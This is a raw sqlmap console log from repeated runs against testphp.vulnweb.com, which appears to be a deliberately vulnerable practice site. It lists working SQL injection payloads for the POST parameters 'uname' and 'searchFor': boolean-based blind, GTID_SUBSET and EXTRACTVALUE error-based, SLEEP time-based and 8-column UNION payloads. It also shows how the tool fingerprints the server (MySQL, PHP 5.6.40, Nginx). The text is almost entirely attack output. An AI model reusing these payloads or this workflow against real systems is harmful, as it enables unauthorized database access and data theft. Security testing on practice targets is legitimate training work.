    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: uname=1' AND GTID_SUBSET(CONCAT(0x7162787171,(SELECT (ELT(3994=3994,1))),0x7162786a71),3994)-- LaLz&pass=1

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: uname=1' AND (SELECT 2389 FROM (SELECT(SLEEP(5)))sCAk)-- ppnp&pass=1

    Type: UNION query
    Title: MySQL UNION query (NULL) - 8 columns
    Payload: uname=1' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7162787171,0x51616153676e4f6d43665154644f61786a4b72676864674e75507065446458586a4f5a416b765562,0x7162786a71),NULL,NULL,NULL,NULL#&pass=1
---
do you want to exploit this SQL injection? [Y/n] Y
[06:03:19] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Nginx 1.19.0, PHP 5.6.40
back-end DBMS: MySQL >= 5.6
[06:03:19] [INFO] you can find results of scanning in multiple targets mode inside the CSV file 'C:\Users\MANSO\AppData\Local\sqlmap\output\results-08022025_0603am.csv'

[*] ending @ 06:03:19 /2025-08-02/

        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.9.7.7#dev}
|_ -| . [']     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 06:05:48 /2025-08-02/

[1/1] URL:
GET http://testphp.vulnweb.com/userinfo.php
POST data: uname=1&pass=1
do you want to test this URL? [Y/n/q]
> Y
[06:05:49] [INFO] testing URL 'http://testphp.vulnweb.com/userinfo.php'
[06:05:49] [INFO] resuming back-end DBMS 'mysql' 
[06:05:49] [INFO] using 'C:\Users\MANSO\AppData\Local\sqlmap\output\results-08022025_0605am.csv' as the CSV results file in multiple targets mode
[06:05:49] [INFO] testing connection to the target URL
got a 302 redirect to 'http://testphp.vulnweb.com/login.php'. Do you want to follow? [Y/n] Y
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n] Y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: uname (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
    Payload: uname=1' OR NOT 3842=3842#&pass=1

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: uname=1' AND GTID_SUBSET(CONCAT(0x7162787171,(SELECT (ELT(3994=3994,1))),0x7162786a71),3994)-- LaLz&pass=1

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: uname=1' AND (SELECT 2389 FROM (SELECT(SLEEP(5)))sCAk)-- ppnp&pass=1

    Type: UNION query
    Title: MySQL UNION query (NULL) - 8 columns
    Payload: uname=1' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7162787171,0x51616153676e4f6d43665154644f61786a4b72676864674e75507065446458586a4f5a416b765562,0x7162786a71),NULL,NULL,NULL,NULL#&pass=1
---
do you want to exploit this SQL injection? [Y/n] Y
[06:05:49] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: PHP 5.6.40, Nginx 1.19.0
back-end DBMS: MySQL >= 5.6
[06:05:49] [INFO] you can find results of scanning in multiple targets mode inside the CSV file 'C:\Users\MANSO\AppData\Local\sqlmap\output\results-08022025_0605am.csv'

[*] ending @ 06:05:49 /2025-08-02/

        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.9.7.7#dev}
|_ -| . [,]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 06:05:50 /2025-08-02/

[1/1] URL:
GET http://testphp.vulnweb.com/search.php?test=query
POST data: searchFor=1
do you want to test this URL? [Y/n/q]
> Y
[06:05:50] [INFO] testing URL 'http://testphp.vulnweb.com/search.php?test=query'
[06:05:50] [INFO] resuming back-end DBMS 'mysql' 
[06:05:50] [INFO] using 'C:\Users\MANSO\AppData\Local\sqlmap\output\results-08022025_0605am.csv' as the CSV results file in multiple targets mode
[06:05:50] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: searchFor (POST)
    Type: boolean-based blind
    Title: MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: searchFor=1' AND EXTRACTVALUE(2508,CASE WHEN (2508=2508) THEN 2508 ELSE 0x3A END) AND 'XfgQ'='XfgQ

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: searchFor=1' AND GTID_SUBSET(CONCAT(0x71766b7a71,(SELECT (ELT(9342=9342,1))),0x7170707071),9342) AND 'qMxl'='qMxl
---
do you want to exploit this SQL injection? [Y/n] Y
[06:05:50] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: PHP 5.6.40, Nginx 1.19.0
back-end DBMS: MySQL >= 5.6
[06:05:50] [INFO] you can find results of scanning in multiple targets mode inside the CSV file 'C:\Users\MANSO\AppData\Local\sqlmap\output\results-08022025_0605am.csv'

[*] ending @ 06:05:50 /2025-08-02/

        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.9.7.7#dev}
|_ -| . [']     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 06:05:51 /2025-08-02/

[1/1] URL:
GET http://testphp.vulnweb.com/search.php?test=query
POST data: searchFor=1
do you want to test this URL? [Y/n/q]
> Y
[06:05:51] [INFO] testing URL 'http://testphp.vulnweb.com/search.php?test=query'
[06:05:51] [INFO] resuming back-end DBMS 'mysql' 
[06:05:51] [INFO] using 'C:\Users\MANSO\AppData\Local\sqlmap\output\results-08022025_0605am.csv' as the CSV results file in multiple targets mode
[06:05:51] [INFO] testing connection to the target URL
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.9.7.7#dev}
|_ -| . ["]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 06:08:46 /2025-08-02/

[1/1] URL:
GET http://testphp.vulnweb.com/userinfo.php
POST data: uname=1&pass=1
do you want to test this URL? [Y/n/q]
> Y
[06:08:46] [INFO] testing URL 'http://testphp.vulnweb.com/userinfo.php'
[06:08:46] [INFO] resuming back-end DBMS 'mysql' 
[06:08:46] [INFO] using 'C:\Users\MANSO\AppData\Local\sqlmap\output\results-08022025_0608am.csv' as the CSV results file in multiple targets mode
[06:08:46] [INFO] testing connection to the target URL
got a 302 redirect to 'http://testphp.vulnweb.com/login.php'. Do you want to follow? [Y/n] Y
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n] Y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: uname (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
    Payload: uname=1' OR NOT 3842=3842#&pass=1

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: uname=1' AND GTID_SUBSET(CONCAT(0x7162787171,(SELECT (ELT(3994=3994,1))),0x7162786a71),3994)-- LaLz&pass=1

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: uname=1' AND (SELECT 2389 FROM (SELECT(SLEEP(5)))sCAk)-- ppnp&pass=1

    Type: UNION query
    Title: MySQL UNION query (NULL) - 8 columns
    Payload: uname=1' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7162787171,0x51616153676e4f6d43665154644f61786a4b72676864674e75507065446458586a4f5a416b765562,0x7162786a71),NULL,NULL,NULL,NULL#&pass=1
---
do you want to exploit this SQL injection? [Y/n] Y
[06:08:46] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Nginx 1.19.0, PHP 5.6.40
back-end DBMS: MySQL >= 5.6
[06:08:46] [INFO] you can find results of scanning in multiple targets mode inside the CSV file 'C:\Users\MANSO\AppData\Local\sqlmap\output\results-08022025_0608am.csv'

[*] ending @ 06:08:46 /2025-08-02/

        ___
       __H__
 ___ ___["]_____ ___ ___  {1.9.7.7#dev}
|_ -| . [,]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 06:08:47 /2025-08-02/

[1/1] URL:
GET http://testphp.vulnweb.com/search.php?test=query
POST data: searchFor=1
do you want to test this URL? [Y/n/q]
> Y
[06:08:47] [INFO] testing URL 'http://testphp.vulnweb.com/search.php?test=query'
[06:08:47] [INFO] resuming back-end DBMS 'mysql' 
[06:08:47] [INFO] using 'C:\Users\MANSO\AppData\Local\sqlmap\output\results-08022025_0608am.csv' as the CSV results file in multiple targets mode
[06:08:47] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: searchFor (POST)
    Type: boolean-based blind
    Title: MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: searchFor=1' AND EXTRACTVALUE(2508,CASE WHEN (2508=2508) THEN 2508 ELSE 0x3A END) AND 'XfgQ'='XfgQ

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: searchFor=1' AND GTID_SUBSET(CONCAT(0x71766b7a71,(SELECT (ELT(9342=9342,1))),0x7170707071),9342) AND 'qMxl'='qMxl
---
do you want to exploit this SQL injection? [Y/n] Y
[06:08:48] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: PHP 5.6.40, Nginx 1.19.0
back-end DBMS: MySQL >= 5.6
[06:08:48] [INFO] you can find results of scanning in multiple targets mode inside the CSV file 'C:\Users\MANSO\AppData\Local\sqlmap\output\results-08022025_0608am.csv'

[*] ending @ 06:08:48 /2025-08-02/

        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.9.7.7#dev}
|_ -| . [)]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 06:08:48 /2025-08-02/

[1/1] URL:
GET http://testphp.vulnweb.com/search.php?test=query
POST data: searchFor=1
do you want to test this URL? [Y/n/q]
> Y
[06:08:49] [INFO] testing URL 'http://testphp.vulnweb.com/search.php?test=query'
[06:08:49] [INFO] resuming back-end DBMS 'mysql' 
[06:08:49] [INFO] using 'C:\Users\MANSO\AppData\Local\sqlmap\output\results-08022025_0608am.csv' as the CSV results file in multiple targets mode
[06:08:49] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: searchFor (POST)
    Type: boolean-based blind
    Title: MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: searchFor=1' AND EXTRACTVALUE(2508,CASE WHEN (2508=2508) THEN 2508 ELSE 0x3A END) AND 'XfgQ'='XfgQ

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: searchFor=1' AND GTID_SUBSET(CONCAT(0x71766b7a71,(SELECT (ELT(9342=9342,1))),0x7170707071),9342) AND 'qMxl'='qMxl
---
do you want to exploit this SQL injection? [Y/n] Y
[06:08:49] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: PHP 5.6.40, Nginx 1.19.0
back-end DBMS: MySQL >= 5.6
[06:08:49] [INFO] you can find results of scanning in multiple targets mode inside the CSV file 'C:\Users\MANSO\AppData\Local\sqlmap\output\results-08022025_0608am.csv'

[*] ending @ 06:08:49 /2025-08-02/

        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.9.7.7#dev}
|_ -| . [.]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 06:08:50 /2025-08-02/

[1/1] URL:
GET http://testphp.vulnweb.com/search.php?test=query
POST data: searchFor=1
do you want to test this URL? [Y/n/q]
> Y
[06:08:50] [INFO] testing URL 'http://testphp.vulnweb.com/search.php?test=query'
[06:08:50] [INFO] resuming back-end DBMS 'mysql' 
[06:08:50] [INFO] using 'C:\Users\MANSO\AppData\Local\sqlmap\output\results-08022025_0608am.csv' as the CSV results file in multiple targets mode
[06:08:50] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: searchFor (POST)
    Type: boolean-based blind
    Title: MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: searchFor=1' AND EXTRACTVALUE(2508,CASE WHEN (2508=2508) THEN 2508 ELSE 0x3A END) AND 'XfgQ'='XfgQ

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: searchFor=1' AND GTID_SUBSET(CONCAT(0x71766b7a71,(SELECT (ELT(9342=9342,1))),0x7170707071),9342) AND 'qMxl'='qMxl
---
do you want to exploit this SQL injection? [Y/n] Y
[06:08:50] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Nginx 1.19.0, PHP 5.6.40
back-end DBMS: MySQL >= 5.6
[06:08:50] [INFO] you can find results of scanning in multiple targets mode inside the CSV file 'C:\Users\MANSO\AppData\Local\sqlmap\output\results-08022025_0608am.csv'

[*] ending @ 06:08:50 /2025-08-02/

        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.9.7.7#dev}
|_ -| . [(]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 06:08:51 /2025-08-02/

[1/1] URL:
GET http://testphp.vulnweb.com/search.php?test=query
POST data: searchFor=1
do you want to test this URL? [Y/n/q]
> Y
[06:08:51] [INFO] testing URL 'http://testphp.vulnweb.com/search.php?test=query'
[06:08:51] [INFO] resuming back-end DBMS 'mysql' 
[06:08:51] [INFO] using 'C:\Users\MANSO\AppData\Local\sqlmap\output\results-08022025_0608am.csv' as the CSV results file in multiple targets mode
[06:08:51] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: searchFor (POST)
    Type: boolean-based blind
    Title: MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: searchFor=1' AND EXTRACTVALUE(2508,CASE WHEN (2508=2508) THEN 2508 ELSE 0x3A END) AND 'XfgQ'='XfgQ

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: searchFor=1' AND GTID_SUBSET(CONCAT(0x71766b7a71,(SELECT (ELT(9342=9342,1))),0x7170707071),9342) AND 'qMxl'='qMxl
---
do you want to exploit this SQL injection? [Y/n] Y
[06:08:51] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: PHP 5.6.40, Nginx 1.19.0
back-end DBMS: MySQL >= 5.6
[06:08:51] [INFO] you can find results of scanning in multiple targets mode inside the CSV file 'C:\Users\MANSO\AppData\Local\sqlmap\output\results-08022025_0608am.csv'

[*] ending @ 06:08:51 /2025-08-02/

        ___
       __H__
 ___ ___[']_____ ___ ___  {1.9.7.7#dev}
|_ -| . [.]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 06:10:23 /2025-08-02/

[1/1] URL:
GET http://testphp.vulnweb.com/search.php?test=query
POST data: searchFor=1
do you want to test this URL? [Y/n/q]
> Y
[06:10:23] [INFO] testing URL 'http://testphp.vulnweb.com/search.php?test=query'
[06:10:23] [INFO] resuming back-end DBMS 'mysql' 
[06:10:23] [INFO] using 'C:\Users\MANSO\AppData\Local\sqlmap\output\results-08022025_0610am.csv' as the CSV results file in multiple targets mode
[06:10:23] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: searchFor (POST)
    Type: boolean-based blind
    Title: MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: searchFor=1' AND EXTRACTVALUE(2508,CASE WHEN (2508=2508) THEN 2508 ELSE 0x3A END) AND 'XfgQ'='XfgQ

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: searchFor=1' AND GTID_SUBSET(CONCAT(0x71766b7a71,(SELECT (ELT(9342=9342,1))),0x7170707071),9342) AND 'qMxl'='qMxl
---
do you want to exploit this SQL injection? [Y/n] Y
[06:10:24] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Nginx 1.19.0, PHP 5.6.40
back-end DBMS: MySQL >= 5.6
[06:10:24] [INFO] you can find results of scanning in multiple targets mode inside the CSV file 'C:\Users\MANSO\AppData\Local\sqlmap\output\results-08022025_0610am.csv'

[*] ending @ 06:10:24 /2025-08-02/

        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.9.7.7#dev}
|_ -| . [)]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 06:10:24 /2025-08-02/

[1/1] URL:
GET http://testphp.vulnweb.com/search.php?test=query
POST data: searchFor=1
do you want to test this URL? [Y/n/q]
> Y
[06:10:25] [INFO] testing URL 'http://testphp.vulnweb.com/search.php?test=query'
[06:10:25] [INFO] resuming back-end DBMS 'mysql' 
[06:10:25] [INFO] using 'C:\Users\MANSO\AppData\Local\sqlmap\output\results-08022025_0610am.csv' as the CSV results file in multiple targets mode
[06:10:25] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: searchFor (POST)
    Type: boolean-based blind
    Title: MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: searchFor=1' AND EXTRACTVALUE(2508,CASE WHEN (2508=2508) THEN 2508 ELSE 0x3A END) AND 'XfgQ'='XfgQ

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: searchFor=1' AND GTID_SUBSET(CONCAT(0x71766b7a71,(SELECT (ELT(9342=9342,1))),0x7170707071),9342) AND 'qMxl'='qMxl
---
do you want to exploit this SQL injection? [Y/n] Y
[06:10:25] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Nginx 1.19.0, PHP 5.6.40
back-end DBMS: MySQL >= 5.6
[06:10:25] [INFO] you can find results of scanning in multiple targets mode inside the CSV file 'C:\Users\MANSO\AppData\Local\sqlmap\output\results-08022025_0610am.csv'

[*] ending @ 06:10:25 /2025-08-02/

        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.9.7.7#dev}
|_ -| . [(]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 06:10:26 /2025-08-02/

[1/1] URL:
GET http://testphp.vulnweb.com/search.php?test=query
POST data: searchFor=1
do you want to test this URL? [Y/n/q]
> Y
[06:10:26] [INFO] testing URL 'http://testphp.vulnweb.com/search.php?test=query'
[06:10:26] [INFO] resuming back-end DBMS 'mysql' 
[06:10:26] [INFO] using 'C:\Users\MANSO\AppData\Local\sqlmap\output\results-08022025_0610am.csv' as the CSV results file in multiple targets mode
[06:10:26] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: searchFor (POST)
    Type: boolean-based blind
    Title: MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: searchFor=1' AND EXTRACTVALUE(2508,CASE WHEN (2508=2508) THEN 2508 ELSE 0x3A END) AND 'XfgQ'='XfgQ

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: searchFor=1' AND GTID_SUBSET(CONCAT(0x71766b7a71,(SELECT (ELT(9342=9342,1))),0x7170707071),9342) AND 'qMxl'='qMxl
---
do you want to exploit this SQL injection? [Y/n] Y
[06:10:26] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Nginx 1.19.0, PHP 5.6.40
back-end DBMS: MySQL >= 5.6
[06:10:26] [INFO] you can find results of scanning in multiple targets mode inside the CSV file 'C:\Users\MANSO\AppData\Local\sqlmap\output\results-08022025_0610am.csv'

[*] ending @ 06:10:26 /2025-08-02/

        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.9.7.7#dev}
|_ -| . [']     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 06:10:27 /2025-08-02/

[1/1] URL:
GET http://testphp.vulnweb.com/userinfo.php
POST data: uname=1&pass=1
do you want to test this URL? [Y/n/q]
> Y
[06:10:27] [INFO] testing URL 'http://testphp.vulnweb.com/userinfo.php'
[06:10:27] [INFO] resuming back-end DBMS 'mysql' 
[06:10:27] [INFO] using 'C:\Users\MANSO\AppData\Local\sqlmap\output\results-08022025_0610am.csv' as the CSV results file in multiple targets mode
[06:10:27] [INFO] testing connection to the target URL
got a 302 redirect to 'http://testphp.vulnweb.com/login.php'. Do you want to follow? [Y/n] Y
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n] Y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: uname (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
    Payload: uname=1' OR NOT 3842=3842#&pass=1

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: uname=1' AND GTID_SUBSET(CONCAT(0x7162787171,(SELECT (ELT(3994=3994,1))),0x7162786a71),3994)-- LaLz&pass=1

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: uname=1' AND (SELECT 2389 FROM (SELECT(SLEEP(5)))sCAk)-- ppnp&pass=1

    Type: UNION query
    Title: MySQL UNION query (NULL) - 8 columns
    Payload: uname=1' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7162787171,0x51616153676e4f6d43665154644f61786a4b72676864674e75507065446458586a4f5a416b765562,0x7162786a71),NULL,NULL,NULL,NULL#&pass=1
---
do you want to exploit this SQL injection? [Y/n] Y
[06:10:27] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Nginx 1.19.0, PHP 5.6.40
back-end DBMS: MySQL >= 5.6
[06:10:27] [INFO] you can find results of scanning in multiple targets mode inside the CSV file 'C:\Users\MANSO\AppData\Local\sqlmap\output\results-08022025_0610am.csv'

[*] ending @ 06:10:27 /2025-08-02/

        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.9.7.7#dev}
|_ -| . [']     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 06:10:28 /2025-08-02/

[1/1] URL:
GET http://testphp.vulnweb.com/search.php?test=query
POST data: searchFor=1
do you want to test this URL? [Y/n/q]
> Y
[06:10:28] [INFO] testing URL 'http://testphp.vulnweb.com/search.php?test=query'
[06:10:28] [INFO] resuming back-end DBMS 'mysql' 
[06:10:28] [INFO] using 'C:\Users\MANSO\AppData\Local\sqlmap\output\results-08022025_0610am.csv' as the CSV results file in multiple targets mode
[06:10:28] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: searchFor (POST)
    Type: boolean-based blind
    Title: MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: searchFor=1' AND EXTRACTVALUE(2508,CASE WHEN (2508=2508) THEN 2508 ELSE 0x3A END) AND 'XfgQ'='XfgQ

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: searchFor=1' AND GTID_SUBSET(CONCAT(0x71766b7a71,(SELECT (ELT(9342=9342,1))),0x7170707071),9342) AND 'qMxl'='qMxl
---
do you want to exploit this SQL injection? [Y/n] Y
[06:10:28] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Nginx 1.19.0, PHP 5.6.40
back-end DBMS: MySQL >= 5.6
[06:10:28] [INFO] you can find results of scanning in multiple targets mode inside the CSV file 'C:\Users\MANSO\AppData\Local\sqlmap\output\results-08022025_0610am.csv'

[*] ending @ 06:10:28 /2025-08-02/

